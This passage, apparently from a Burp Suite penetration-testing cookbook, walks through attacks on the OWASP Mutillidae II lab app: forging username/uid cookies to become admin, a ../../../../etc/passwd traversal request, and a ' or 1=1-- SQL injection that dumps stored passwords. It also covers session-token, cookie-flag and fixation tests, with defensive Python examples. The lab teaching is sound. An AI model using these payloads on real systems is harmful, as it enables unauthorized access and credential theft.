6. Let's attempt to manipulate the parameters username and the uid stored in 
the cookie to a different role. We will use Burp's Proxy | Intercept to help 
us perform this attack. 

7. Switch to the Proxy | Intercept tab, and press the Intercept is on button. 
Return to the Firefox browser and reload the login page. 


8. The request is paused within the Proxy | Intercept tab. While it is paused, 
change the value assigned to the username from john to admin. Also, 
change the value assigned to the uid from 3 to 1: 


[Screenshot: Proxy | Intercept, Request to http://192.168.56.101:80, with the cookie values edited:]

GET /mutillidae/index.php?popUpNotificationCode=AU1 HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: showhints=1; username=admin; uid=1; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


9. Click the Forward button, and press the Intercept is on again to toggle the 
intercept button to OFF (Intercept is off). 

10. Return to the Firefox browser, and notice we are now logged in as an 
admin! We were able to escalate our privileges from a regular user to an 
admin, since the developer did not perform any authorization checks on the 
assigned role: 


[Screenshot: Mutillidae header after the forwarded request. Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled (1 - 5cr1pt K1dd1e), and the status now reads "Logged In Admin: admin (g0t r00t?)". The menu shows Home, Logout, Toggle Hints, Show Popup Hints, Toggle Security, Enforce SSL, Reset DB, View Log and View Captured Data.]


How it works... 


There are several application issues behind the privilege escalation shown in 
this recipe. The application places the user's identity and role indicators 
(username and uid) in cookies that the client fully controls, and then trusts 
those values on every request without binding them to the server-side session or 
protecting their integrity. Any action related to account provisioning (that is, 
role assignment) should be performed only by administrators, and the current 
role should be looked up from the server-side record, never read back from the 
client. The sequential user ID (for example, uid=3) compounds the problem: it is 
trivially guessable, and because most applications create the administrator 
account first, changing the digit from 3 to 1 was a probable guess for the admin 
account. 
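The following is an added example, not code from the book or from Mutillidae, that contrasts the cookie-trusting behaviour exploited above with a server-side session lookup. The user table, the admin password and the session store are constructed for the example; only the john/monkey credentials come from the recipe.

```python
import hmac
import secrets

# Constructed user table standing in for Mutillidae's accounts. The john/monkey
# pair is from the recipe; the admin password is invented for the example.
USERS = {
    1: {"username": "admin", "password": "adminpass", "role": "admin"},
    3: {"username": "john",  "password": "monkey",    "role": "user"},
}

# Server-side session store: opaque session id -> data the client never sees.
SESSIONS = {}


def parse_cookie_header(header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def login(username, password):
    """Authenticate and return the cookies the (vulnerable) app would set.

    Real code stores password hashes; plaintext keeps the example short.
    """
    for uid, rec in USERS.items():
        if rec["username"] == username and hmac.compare_digest(rec["password"], password):
            sid = secrets.token_hex(16)
            SESSIONS[sid] = {"uid": uid}
            # The app also hands identity to the client, which is the flaw.
            return {"PHPSESSID": sid, "username": username, "uid": str(uid)}
    return None


def vulnerable_whoami(cookie_header):
    """Security level 0: believe the username and uid cookies the browser sends."""
    c = parse_cookie_header(cookie_header)
    try:
        uid = int(c.get("uid", ""))
    except ValueError:
        return (None, "anonymous")
    rec = USERS.get(uid)
    if rec is None:
        return (None, "anonymous")
    return (c.get("username"), rec["role"])


def hardened_whoami(cookie_header):
    """Identity comes only from the server-side session bound to PHPSESSID."""
    c = parse_cookie_header(cookie_header)
    sess = SESSIONS.get(c.get("PHPSESSID", ""))
    if sess is None:
        return (None, "anonymous")
    rec = USERS[sess["uid"]]
    return (rec["username"], rec["role"])
```

With the hardened lookup the forged username=admin; uid=1 cookies are simply ignored: the only thing the client can present is the opaque session id, and the role behind it lives on the server.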


Testing for Insecure Direct Object 
Reference (IDOR) 


Allowing unauthorized direct access to files or resources on a system based on 
user-supplied input is known as Insecure Direct Object Reference (IDOR). 
This vulnerability allows the bypassing of authorization checks placed on such 
files or resources. IDOR is a result of unchecked user supplied input to retrieve 
an object without performing authorization checks in the application code. 


Getting ready 


Using OWASP Mutillidae II as our target application, let's manipulate the value 
of the phpfile parameter to determine whether we can make a call to a direct 
object reference on the system, such as the /etc/passwd file. 


How to do it... 


1. From the Mutillidae menu, select OWASP 2013 | A4 — Insecure Direct 
Object References | Source Viewer: 


[Screenshot: Mutillidae menu, OWASP 2013 | A4 - Insecure Direct Object References, with the sub-items Text File Viewer and Source Viewer.]


2. From the Source Viewer page, using the default file selected in the drop- 
down box (upload-file.php), click the View File button to see the 
contents of the file displayed below the button: 


[Screenshot: Source Code Viewer page (Version: 2.6.24, Security Level: 0 (Hosed), Not Logged In). Source File Name: upload-file.php; File: upload-file.php. The displayed source begins:]

<?php include_once (__ROOT__.'/classes/FileUploadExceptionHandler.php');?>
<?php include_once (__ROOT__.'/includes/back-button.inc');?>
<?php include_once (__ROOT__.'/includes/hints-level-1/level-1-hints-menu-wrapper.inc');?>
<?php
try{
    switch ($_SESSION["security-level"]){
        case "0": // This code is insecure. No input validation is performed.
            $lEnableJavaScriptValidation = FALSE;


3. Switch to Burp's Proxy | HTTP history tab. Find the POST request you just 
made while viewing the upload-file.php file. Note the phpfile parameter 
with the value of the file to display. What would happen if we change the 
value of this parameter to something else? 


[Screenshot: Proxy | HTTP history with the POST to source-viewer.php selected (status 200). Request | Raw:]

POST /mutillidae/index.php?page=source-viewer.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=source-viewer.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Cookie: showhints=1; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1

page=source-viewer.php&phpfile=upload-file.php&source-file-viewer-php-submit-button=View+File


4. Let's perform an IDOR attack by manipulating the value provided to the 
phpfile parameter to reference a file on the system instead. For example, 
let's try changing the upload-file.php value to ../../../../etc/passwd 
via Burp's Proxy | Intercept functionality. 

5. To perform this attack, follow these steps. 

1. Switch to the Proxy |Intercept tab, and press the Intercept is on 
button. 

2. Return to the Firefox browser and click the View File button again so 
that the POST is re-sent. The request is paused and contained within the 
Proxy | Intercept tab. 


3. As the request is paused, change the value assigned to the phpfile 
parameter to the value ../../../../etc/passwd instead: 


[Screenshot: Proxy | Intercept, Request to http://192.168.56.101:80, Intercept is on. The edited request reads (Burp recalculates Content-Length for the longer body):]

POST /mutillidae/index.php?page=source-viewer.php HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/mutillidae/index.php?page=source-viewer.php
Content-Type: application/x-www-form-urlencoded
Content-Length: (updated automatically by Burp)
Cookie: showhints=1; PHPSESSID=<session token value>; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Connection: close
Upgrade-Insecure-Requests: 1

page=source-viewer.php&phpfile=../../../../etc/passwd&source-file-viewer-php-submit-button=View+File


6. Click the Forward button. Now press the Intercept is on button again to 
toggle the intercept button to OFF (Intercept is off). 


7. Return to the Firefox browser. Notice we can now see the contents of the 
/etc/passwd file! 


[Screenshot: Source Code Viewer. The Source File Name drop-down still shows upload-file.php, but the File: line reads ../../../../etc/passwd and the page lists the system's accounts:]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh


How it works... 


The phpfile parameter names the file to display and is used directly, with no 
authorization check and no restriction to the set of files the viewer is meant 
to show, so a traversal string pulls in any file the web server process can 
read. Developers and system administrators must enforce access controls and 
checks in the application code before a sensitive file or resource is revealed; 
when these checks are missing or bypassable, an IDOR vulnerability is present. 
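The following is an added example, not code from the book or from Mutillidae, showing the classic fix for this class of IDOR: the form submits an opaque per-session reference instead of a file name, and the server maps it back to the real file. The source directory, the list of viewable files and the session class are constructed for the example.

```python
import posixpath
import secrets

# Constructed: the directory the viewer may read from and the files it may show.
SOURCE_DIR = "/var/www/mutillidae"
VIEWABLE_FILES = ("upload-file.php", "login.php", "user-info.php")


class SourceViewerSession:
    """Indirect object references: the form carries opaque per-session tokens,
    never file names, so a traversal string has nothing to map to."""

    def __init__(self):
        self._refs = {}   # opaque token -> real file name, issued to this session only

    def dropdown_options(self):
        """Build the option list for the form; call once per page render."""
        self._refs = {secrets.token_urlsafe(9): name for name in VIEWABLE_FILES}
        return dict(self._refs)

    def open_path(self, submitted_ref):
        """Resolve the submitted value; anything not issued to this session is refused."""
        name = self._refs.get(submitted_ref)
        if name is None:
            raise PermissionError(f"unknown object reference: {submitted_ref!r}")
        path = posixpath.normpath(posixpath.join(SOURCE_DIR, name))
        # Belt and braces: even a mapped name must stay inside SOURCE_DIR.
        if not path.startswith(SOURCE_DIR + "/"):
            raise PermissionError("reference resolves outside the source directory")
        return path


def vulnerable_open_path(phpfile):
    """Security level 0: the submitted value is the file name."""
    return posixpath.normpath(posixpath.join(SOURCE_DIR, phpfile))


def token_for(options, name):
    """Helper: find the token a rendered form would submit for a given file."""
    for token, filename in options.items():
        if filename == name:
            return token
    raise KeyError(name)
```

Because the tokens are minted per session, a reference captured from one user's form is worthless in another user's session, which is the property a plain allowlist of names does not give you.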


Assessing Session Management 
Mechanisms 


In this chapter, we will cover the following recipes: 


Testing session token strength using Sequencer 
Testing for cookie attributes 

Testing for session fixation 

Testing for exposed session variables 

Testing for Cross-Site Request Forgery 


Introduction 


This chapter covers techniques used to bypass and assess session management 
schemes. Session management schemes are used by applications to keep track of 
user activity, usually by means of session tokens. Web assessments of session 
management also involve determining the strength of session tokens used and 
whether those tokens are properly protected. We will learn how to use Burp to 
perform such tests. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


OWASP Broken Web Applications (VM) 

OWASP Mutillidae link 

Burp Proxy Community or Professional (https://portswigger.net/burp/) 
A Firefox browser configured to allow Burp to proxy traffic 


(https://www.mozilla.org/en-US/firefox/new/) 


Testing session token strength using 
Sequencer 


To track user activity from page to page within an application, developers create 
and assign unique session token values to each user. Most session token 
mechanisms include session IDs, hidden form fields, or cookies. Cookies are 
placed within the user's browser on the client-side. 


These session tokens should be examined by a penetration tester to ensure their 
uniqueness, randomness, and cryptographic strength, to prevent information 
leakage. 


If a session token is predictable, an attacker can compute or guess another 
user's token and hijack that session outright. If the token does not change 
after login, an attacker can instead plant (fixate) a token they already know 
in the victim's browser and wait for the victim to authenticate with it; this is 
known as a session fixation attack. In both cases the purpose is the same: to 
act as the user and harvest the sensitive data in the user's account. 


Getting ready 


We'll check the session tokens used in OWASP Mutillidae II to ensure they are 
created in a secure and unpredictable way. An attacker who is able to predict 
or forge a weak session token can hijack other users' sessions without ever 
learning their credentials. 


How to do it... 


Ensure Burp and the OWASP BWA VM are running and that Burp is configured 
in the Firefox browser used to view OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox browser to access the home page of OWASP Mutillidae II 
(URL: http://<your_VM_assigned_IP_address>/mutillidae/). Make 
sure you are starting a fresh session of the Mutillidae application and not 
logged into it already: 


[Screenshot: OWASP Mutillidae II home page, Version: 2.6.24, Security Level: 0 (Hosed), Hints: Enabled (1 - 5cr1pt K1dd1e), Not Logged In.]


3. Switch to the Proxy | HTTP History tab and select the request showing your 
initial browse to the Mutillidae home page. 

4. Look for the GET request and the associated response containing the 
Set-Cookie: assignments. Whenever you see this assignment, you know you are 
getting a freshly created cookie for your session. Specifically, we are 
interested in the PHPSESSID cookie value: 


[Screenshot: Proxy | HTTP history (Logging of out-of-scope Proxy traffic is disabled; Filter: Hiding CSS, image and general binary content). The Response | Raw tab of the initial GET to the home page shows:]

HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 18:41:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_pyth[...] Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=<session token value>; path=/
Set-Cookie: showhints=1
Logged-In-User:
Vary: Accept-Encoding
Content-Length: 45632
Connection: close
Content-Type: text/html

[HTML body follows]


5. Highlight the value of the of the PHPSESSID cookie, right-click, and 
select Send to Sequencer: 


[Screenshot: the same response in the Response | Raw tab with the PHPSESSID value highlighted and the context menu open, offering Send to Spider, Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater and Send to Sequencer.]


Sequencer is a tool within Burp designed to determine the strength or the 
quality of the randomness created within a session token. 


6. After sending the value of the PHPSESSID parameter over to Sequencer, you 
will see the value loaded in the Select Live Capture Request table. 

7. Before pressing the Start live capture button, scroll down to the Token 
Location Within Response section. In the Cookie dropdown list, select 
PHPSESSID=<captured session token value>: 


[Screenshot: Sequencer | Live capture tab. Select Live Capture Request: "Send requests here from other tools to configure a live capture." Token Location Within Response: "Select the location in the response where the token appears", with the Cookie radio button selected and a dropdown listing PHPSESSID=<captured session token value> and showhints=1; Form field and Custom location are the alternatives.]


8. Since we have the correct cookie value selected, we can begin the live 
capture process. Click the Start live capture button, and Burp will send 
multiple requests, extracting the PHPSESSID cookie out of each response. 


After each capture, Sequencer performs a statistical analysis of the level of 
randomness in each token. 


9. Allow the capture to gather and analyze at least 200 tokens, but feel free to 
let it run longer if you like: 


[Screenshot: Burp Sequencer [live capture #1: http://192.168.56.101]. Live capture (596 tokens); Requests: 596, Errors: 0; buttons Pause, Stop, Copy tokens, Save tokens, Analyze now; Auto analyze (next: 600); tabs Summary, Character-level analysis, Bit-level analysis, Analysis Options.]


10. Once you have at least 200 samples, click the Analyze now button. 
Whenever you are ready to stop the capturing process, press the Stop button 
and confirm Yes: 


[Screenshot: Burp Sequencer [live capture #1: http://192.168.56.101], Live capture (5855 tokens), with the "Are you sure you want to stop?" confirmation dialog shown after pressing Stop.]


11. After the analysis is complete, the Summary tab of Sequencer provides an 
overall result. In this case, the quality of randomness for the PHPSESSID 
session token is rated excellent, and the effective entropy is estimated at 112 
bits. From a web pentester's perspective these session tokens are strong, so 
there is no vulnerability to report here. Bear in mind that Sequencer measures 
the statistical randomness of the sample it saw; it cannot prove the generator 
is cryptographically secure, so the result is absence of evidence of weakness 
rather than proof of strength. Even so, it is good practice to perform such 
checks on session tokens: 


[Screenshot: Sequencer live capture, Requests: 20004, Errors: 0, Summary tab.]

Overall result
The overall quality of randomness within the sample is estimated to be: excellent.
At a significance level of 1%, the amount of effective entropy is estimated to be: 112 bits.

Note: Character-level analysis was not performed because the sample size is too small relative to the size of the character set used in the sampled tokens.

Effective Entropy
[Chart: number of bits of effective entropy at each significance level (0.001% to 10%), based on all tests.]


How it works... 


To better understand the math and hypothesis behind Sequencer, consult 
Portswigger's documentation on the topic here: 


https://portswigger.net/burp/documentation/desktop/tools/sequencer/tests. 
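The following is an added example, not code from the book or from PortSwigger, that gives a feel for what Sequencer is measuring by running two crude tests over a token sample offline: a per-position Shannon entropy estimate and a check for sequential values. The two token generators are constructed for the example (one backed by the OS CSPRNG, one a zero-padded counter); the estimator is deliberately simpler and more optimistic than Sequencer's battery of tests.

```python
import math
import secrets
from collections import Counter


def strong_tokens(n, nbytes=13):
    """Constructed 'good' sample: 26 hex characters from the OS CSPRNG."""
    return [secrets.token_hex(nbytes) for _ in range(n)]


def weak_tokens(n, start=1000):
    """Constructed 'bad' sample: a zero-padded counter dressed up as a token."""
    return [f"{start + i:026d}" for i in range(n)]


def positional_entropy_bits(tokens):
    """Sum of per-position Shannon entropy across the token width.

    Positions are treated as independent, so this is an optimistic upper bound
    (Sequencer's tests are considerably stricter). It still separates a counter
    from a random string by a wide margin.
    """
    if not tokens:
        return 0.0
    n = len(tokens)
    width = min(len(t) for t in tokens)
    total = 0.0
    for pos in range(width):
        counts = Counter(t[pos] for t in tokens)
        total -= sum(c / n * math.log2(c / n) for c in counts.values())
    return total


def sequential_fraction(tokens, window=1000):
    """Share of consecutive tokens whose numeric values lie within `window`.

    Tokens are read as base-16 numbers; anything that is not hex counts as unrelated.
    """
    def as_int(t):
        try:
            return int(t, 16)
        except ValueError:
            return None

    pairs = close = 0
    for a, b in zip(tokens, tokens[1:]):
        x, y = as_int(a), as_int(b)
        pairs += 1
        if x is not None and y is not None and abs(x - y) <= window:
            close += 1
    return close / pairs if pairs else 0.0


def analyze(tokens):
    """Summary in the spirit of Sequencer's Summary tab."""
    return {
        "samples": len(tokens),
        "unique": len(set(tokens)),
        "estimated_bits": round(positional_entropy_bits(tokens), 1),
        "sequential_fraction": round(sequential_fraction(tokens), 3),
    }


if __name__ == "__main__":
    print("strong:", analyze(strong_tokens(2000)))
    print("weak:  ", analyze(weak_tokens(2000)))
```

A sample of a couple of thousand 26-character hex tokens comes out near 100 bits on this estimator, while the counter scores around 11 bits and shows nearly every consecutive pair within a few units of each other. Sequencer needs a comparable sample size (the recipe's 200 tokens is a minimum; it ran to 20,000) for its statistics to mean much.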


Testing for cookie attributes 


Important user-specific information, such as session tokens, is often stored in 
cookies within the client browser. Due to their importance, cookies need to be 
protected from malicious attacks. This protection usually comes in the form of 
two flags—secure and HttpOnly. 


The secure flag informs the browser to only send the cookie to the web server if 
the protocol is encrypted (for example, HTTPS, TLS). This flag protects the 
cookie from eavesdropping over unencrypted channels. 


The HttpOnly flag instructs the browser to withhold the cookie from script, so 
document.cookie can neither read nor modify it. This limits the damage of a 
cross-site scripting attack, since an injected script cannot steal the session 
token, although it does not prevent the XSS itself or stop the script from 
issuing requests that the browser still sends with the cookie attached. 


Getting ready 


Check the cookies used in the OWASP Mutillidae II application, to ensure the 
presence of protective flags. Since the Mutillidae application runs over an 
unencrypted channel (for example, HTTP), we can only check for the presence 
of the HttpOnly flag. Therefore, the secure flag is out of scope for this recipe. 


How to do it... 


Ensure Burp and OWASP BWA VM are running and that Burp is configured in 
the Firefox browser used to view OWASP BWA applications. 


1. From the OWASP BWA Landing page, click the link to the OWASP 
Mutillidae II application. 

2. Open the Firefox Browser, to access the home page of OWASP Mutillidae 
II (URL: http://<your_VM_assigned_IP_address>/mutillidae/). Make 
sure you are starting a fresh session and you are not logged in to the 
Mutillidae application: 


[Screenshot: OWASP Mutillidae II home page: "Mutillidae: Deliberately Vulnerable Web Pen-Testing Application", with the Like Mutillidae?, What Should I Do?, Video Tutorials, Help Me!, Listing of vulnerabilities, Bug Tracker and Bug Report Email Address links.]

3. Switch to the Proxy | HTTP history tab, and select the request showing your 
initial browse to the Mutillidae home page. Look for the GET request and its 
associated response containing Set-Cookie: assignments. Whenever you 
see this assignment, you can ensure you are getting a freshly created cookie 
for your session. Specifically, we are interested in the PHPSESSID cookie 
value. 

4. Examine the end of the Set-Cookie: assignments lines. Notice the absence 
of the HttpOnly flag for both lines. This means the PHPSESSID and 


showhints cookie values are not protected from JavaScript manipulation. 
This is a security finding that you would include in your report: 


[Screenshot: Proxy | HTTP history (Logging of out-of-scope Proxy traffic is disabled; Filter: Hiding CSS, image and general binary content), Response | Raw tab of the home page response. Neither Set-Cookie line carries an HttpOnly (or Secure) attribute:]

HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 18:41:58 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_pyth[...] Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=<session token value>; path=/
Set-Cookie: showhints=1
Logged-In-User:
Vary: Accept-Encoding
Content-Length: 45632
Connection: close
Content-Type: text/html


How it works... 


If the two cookies had HttpOnly flags set, the flags would appear at the end of 
the Set-Cookie assignment lines. When present, the flag would immediately 
follow a semicolon ending the path scope of the cookie, followed by the string 
HttpOnly. The display is similar for the Secure flag as well: 


Set-Cookie: PHPSESSID=<session token value>; path=/;Secure;HttpOnly; 


Testing for session fixation 


Session tokens are assigned to users for tracking purposes. This means that when 
browsing an application while unauthenticated, a user is assigned a unique session 
ID, which is usually stored in a cookie. Application developers should always 
create a new session token after the user logs into the website. If this session 
token does not change, the application could be susceptible to a session fixation 
attack. It is the responsibility of web penetration testers to determine whether 
this token changes value from the unauthenticated state to the authenticated state. 


Session fixation is present when application developers do not invalidate the 
unauthenticated session token, allowing the user to use the same one after 
authentication. This scenario allows an attacker with a stolen session token to 
masquerade as the user. 


Getting ready 


Using the OWASP Mutillidae II application and Burp's Proxy HTTP History and 
Comparer, we will examine the unauthenticated PHPSESSID session token value. 
Then, we will log in to the application and compare the unauthenticated value 
against the authenticated value to determine the presence of the session fixation 
vulnerability. 


How to do it... 


1. Navigate to the login screen (click Login/Register from the top menu), but 
do not log in yet. 

2. Switch to Burp's Proxy HTTP history tab, and look for the GET request 
showing when you browsed to the login screen. Make a note of the value 
assigned to the PHPSESSID parameter placed within a cookie: 




3. Right-click the PHPSESSID parameter and send the request to Comparer: 




4. Return to the login screen (click Login/Register from the top menu), and, 
this time, log in under the username ed and the password pentest. 

5. After logging in, switch to Burp's Proxy HTTP history tab. Look for the 
POST request showing your login (for example, the 302 HTTP status code) 
as well as the immediate GET request following the POST. Note the 
PHPSESSID assigned after login. Right-click and send this request to 
Comparer. 

6. Switch to Burp's Comparer. The appropriate requests should already be 
highlighted for you. Click the Words button in the bottom right-hand 
corner: 




A popup shows a detailed comparison of the differences between the two 
requests. Note the value of PHPSESSID does not change between the 
unauthenticated session (on the left) and the authenticated session (on the 
right). This means the application has a session fixation vulnerability: 




How it works... 


In this recipe, we examined how the PHPSESSID value assigned to an 
unauthenticated user remained constant even after authentication. This is a 
security vulnerability allowing for the session fixation attack. 
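The two checks performed by hand above, the HttpOnly/Secure inspection of Set-Cookie lines from the previous recipe and the pre-login versus post-login PHPSESSID comparison from this one, as an added Python example (not code from the book or from Burp). The header lines are constructed to resemble the Mutillidae traffic; the token values are made up.

```python
# Added example for the two recipes above; it is not code from the book or
# from Burp. It re-creates the checks done by eye in Burp's HTTP history and
# Comparer: per-cookie HttpOnly/Secure flags on Set-Cookie lines, and whether
# the PHPSESSID value seen before login is still in use after login.
# All header lines below are constructed; the token values are made up.
import re
from typing import Dict, List, Tuple


def parse_set_cookie(header: str) -> Tuple[str, str, Dict[str, str]]:
    """Split one Set-Cookie header into (name, value, {attribute: value}).

    Attribute names are lower-cased; bare flags such as HttpOnly map to ''.
    The 'Set-Cookie:' prefix is optional so raw proxy lines can be pasted in.
    """
    line = re.sub(r"(?i)^set-cookie:\s*", "", header.strip())
    parts = [p.strip() for p in line.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Turn a request 'Cookie:' header into {name: value}."""
    line = re.sub(r"(?i)^cookie:\s*", "", header.strip())
    cookies: Dict[str, str] = {}
    for part in line.split(";"):
        if "=" in part:
            name, _, value = part.partition("=")
            cookies[name.strip()] = value.strip()
    return cookies


def cookie_flag_findings(set_cookie_lines: List[str], over_tls: bool) -> List[str]:
    """Report each Set-Cookie line missing HttpOnly, and missing Secure when the
    site is served over HTTPS (Secure is moot on a plain-HTTP lab target)."""
    findings = []
    for line in set_cookie_lines:
        name, _, attrs = parse_set_cookie(line)
        if "httponly" not in attrs:
            findings.append(f"{name}: missing HttpOnly (value readable by JavaScript)")
        if over_tls and "secure" not in attrs:
            findings.append(f"{name}: missing Secure (cookie can be sent over HTTP)")
    return findings


def session_fixation(pre_login_cookie: str, post_login_cookie: str,
                     session_name: str = "PHPSESSID") -> bool:
    """True when the session token sent before login is the same one sent after
    login, i.e. the application did not rotate it (the Comparer result above)."""
    before = parse_cookie_header(pre_login_cookie).get(session_name)
    after = parse_cookie_header(post_login_cookie).get(session_name)
    return before is not None and before == after


# Constructed sample data mirroring the Mutillidae traffic described above.
RESPONSE_SET_COOKIES = [
    "Set-Cookie: PHPSESSID=0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d; path=/",
    "Set-Cookie: showhints=1; path=/",
]
HARDENED_SET_COOKIES = [
    "Set-Cookie: PHPSESSID=0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d; path=/; Secure; HttpOnly",
    "Set-Cookie: showhints=1; path=/; Secure; HttpOnly",
]
PRE_LOGIN_REQUEST = "Cookie: showhints=1; PHPSESSID=0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d"
# Mutillidae adds username/uid cookies after login but keeps the same PHPSESSID.
POST_LOGIN_REQUEST = ("Cookie: showhints=1; username=ed; uid=24; "
                      "PHPSESSID=0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d")
# What a fixed application would send: a fresh token issued at login.
ROTATED_REQUEST = ("Cookie: showhints=1; username=ed; uid=24; "
                   "PHPSESSID=f9e8d7c6b5a4938271605f4e3d2c1b0a")

if __name__ == "__main__":
    for finding in cookie_flag_findings(RESPONSE_SET_COOKIES, over_tls=False):
        print("FINDING:", finding)
    print("session fixation:", session_fixation(PRE_LOGIN_REQUEST, POST_LOGIN_REQUEST))
```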


Testing for exposed session variables 


Session variables such as tokens, cookies, or hidden form fields are used by 
application developers to send data between the client and the server. Since these 
variables are exposed on the client-side, an attacker can manipulate them in an 
attempt to gain access to unauthorized data or to capture sensitive information. 


Burp's Proxy option provides a feature to enhance the visibility of so-called 
hidden form fields. This feature allows web application penetration testers to 
determine the level of the sensitivity of data held in these variables. Likewise, a 
pentester can determine whether the manipulation of these values produces a 
different behavior in the application. 


Getting ready 


Using the OWASP Mutillidae II application and Burp's Proxy's Unhide hidden 
form fields feature, we'll determine whether manipulation of a hidden form field 
value results in gaining access to unauthorized data. 


How to do it... 


1. Switch to Burp's Proxy tab, scroll down to the Response Modification 
section, and check the boxes for Unhide hidden form fields and 
Prominently highlight unhidden fields: 




2. Navigate to the User Info page: OWASP 2013 | A1 — Injection (SQL) | 
SQLi — Extract Data | User Info (SQL): 




3. Note the hidden form fields now prominently displayed on the page: 




4. Let's try to manipulate the value shown, user-info.php, by changing it to 
admin.php and see how the application reacts. Modify user-info.php to 
admin.php within the Hidden field [page] textbox: 




5. Hit the Enter key after making the change. You should now see a new page 
loaded showing PHP Server Configuration information: 




How it works... 


As seen in this recipe, there isn't anything hidden about hidden form fields. As 
penetration testers, we should examine and manipulate these values, to 
determine whether sensitive information is, inadvertently, exposed or whether 
we can change the behavior of the application from what is expected, based on 
our role and authentication status. In the case of this recipe, we were not even 
logged into the application. We manipulated the hidden form field labeled page 
to access a page containing fingerprinting information. Access to such 
information should be protected from unauthenticated users. 


Testing for Cross-Site Request Forgery 


Cross-Site Request Forgery (CSRF) is an attack that rides on an authenticated 
user's session to allow an attacker to force the user to execute unwanted actions 
on the attacker's behalf. The initial lure for this attack can be a phishing email or 
a malicious link executing through a cross-site scripting vulnerability found on 
the victim's website. CSRF exploitation may lead to a data breach or even a full 
compromise of the web application. 


Getting ready 


Using the OWASP Mutillidae II application registration form, determine whether 
a CSRF attack is possible within the same browser (a different tab) while an 
authenticated user is logged into the application. 


How to do it... 


To set a baseline for this recipe, let's first count the current number of records in 
the account table, using SQL Injection to view them: 


1. Navigate to the User Info page: OWASP 2013 | A1 — Injection (SQL) | 
SQLi — Extract Data | User Info (SQL). 


2. At the username prompt, type in a SQL Injection payload to dump the entire 
account table contents. The payload is ' or 1=1-- <space> (tick or 1 
equals 1 dash dash space). Then press the View Account Details button. 


3. Remember to include the space after the two dashes, since this is a MySQL 
database; otherwise, the payload will not work: 




4. When performed correctly, a message displays that there are 24 records 
found in the database for users. The data shown following the message 
reveals the usernames, passwords, and signature strings of all 24 accounts. 
Only two account details are shown here as a sample: 


Results for ' or 1=1 -- : 24 records found. 

Username=admin 
Password=admin 
Signature=g0t r00t? 

Username=adrian 
Password=somepassword 
Signature=Zombie Films Rock! 


We confirmed 24 records currently exist in the accounts table of the 
database. 


5. Now, return to the login screen (click Login/Register from the top menu) 
and select the link Please register here. 

6. After clicking the Please register here link, you are presented with a 
registration form. 

7. Fill out the form to create a tester account. Type in the Username as tester, 
the Password as tester, and the Signature as This is a tester account: 




8. After clicking the Create Account button, you should receive a green 
banner confirming the account was created: 


